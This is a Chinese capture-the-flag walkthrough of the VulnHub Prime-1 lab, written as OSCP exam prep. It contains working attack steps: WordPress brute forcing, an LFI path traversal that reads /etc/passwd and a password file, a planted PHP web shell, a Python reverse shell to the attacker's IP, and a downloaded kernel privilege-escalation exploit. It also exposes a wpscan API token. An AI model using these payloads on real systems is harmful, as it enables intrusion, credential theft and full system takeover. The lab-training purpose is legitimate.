泷羽Sec-尘宇安全
前言
oscp备考,oscp系列——Prime_Series_Level-1靶场,wpscan爆破,LFI漏洞,wordpress更改文件getshell,ubuntu内核提权
难度简单偏上
- 对于低权限shell获取涉及:wpscan爆破,LFI漏洞,wordpress更改文件getshell
- 对于提权:ubuntu内核提权
下载地址:
https://www.vulnhub.com/entry/prime-1,358/
namp
主机发现
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:20 CST
Nmap scan report for 10.10.10.1
Host is up (0.00092s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00069s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.152
Host is up (0.00044s latency).
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E3:2F:42 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap scan report for 10.10.10.151
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 3.52 seconds
端口扫描
└─# nmap --min-rate 10000 -p- 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:21 CST
Nmap scan report for 10.10.10.152
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds
└─# nmap --min-rate 10000 -p- 10.10.10.152 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:24 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.00086s latency).
All 65535 scanned ports on 10.10.10.152 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds
详细端口扫描
└─# nmap -sV -sT -sC -O -p22,80 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 17:13 CST
Nmap scan report for 10.10.10.152
Host is up (0.00087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:E3:08:DA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
信息收集
web页面,80
发现是wordpress5.2.2
目录扫描
dirb http://10.10.10.152/ -X .txt,.php,.zip
http://10.10.10.152/dev
没什么提示
http://10.10.10.152/secret.txt
提到一个location.txt文件和一个链接
访问一下
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
发现使用了wfuzz,应该是要进行参数爆破
漏洞利用
wpscan
wpscan --url http://10.10.10.152/wordpress/ -e u --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ
得到一个用户名
victor
进行密码爆破
wpscan --url http://10.10.10.152/wordpress/ -U victor -P /usr/share/wordlists/rockyou.txt -t 30 --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ
爆破识别
参数爆破,LFI漏洞
之前信息收集知道要参数爆破,我们使用ffuf爆破
ffuf -u http://10.10.10.152/index.php?FUZZ=./secret.txt -w /usr/share/dirb/wordlists/common.txt -fs 0 >fuzz.txt
使用grep过滤一下
cat fuzz.txt | grep -v "136"
发现file参数,访问一下
http://10.10.10.152/index.php?file=./secret.txt
说我在挖掘错误的文件,尝试之前提到的文件
http://10.10.10.152/index.php?file=location.txt
他说使用 ‘secrettier360’ 参数在其他一些php页面,就只有一个image.php了
http://10.10.10.152/image.php?secrettier360=./index.php
说我们得到了正确的参数,读取一下/etc/passwd
http://10.10.10.152/image.php?secrettier360=../../../../../../../../etc/passwd
find password.txt file in my directory
在我的目录中查找password.txt文件
根据这个saket用户名,路径为/home/saket/password.txt,读取一下
http://10.10.10.152/image.php?secrettier360=../../../../../../../../home/saket/password.txt
得到
follow_the_ippsec
之前得到的用户名:victor,尝试登录试试
wordpress更改网页文件,getshell
登录成功,上传反弹shell脚本
发现不行
在网上搜索一下wordpress 5.2.2漏洞,来到编辑文件的地方,找到一个可写文件,写入木马
<?php
system($_GET["cmd"]);
?>
这里文件的访问路径规律为
- 首先确定在
/wordpress/wp-content/themes/目录下面 - 然后分类为
Twenty Nineteen,则下一层目录为/twentynineteen - 最终路径为
http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=ls
访问一下
反弹shell
http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.128%22,6666));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
提权
读取一下配置文件,获取mysql账号密码
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'yourpasswordhere' );
进入数据看看没有发现什么信息
sudo -l查看一下权限,发现有一个不需要密码的可以运行文件/home/saket/enc
不过尝试了一些,发现不行
ubuntu内核提权,cve-2017-16995
查看一下内核
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/saket$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
www-data@ubuntu:/home/saket$
查看一下是否存在漏洞,发现有一个比较符合
利用一下
wget http://10.10.10.128/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
成功获取root权限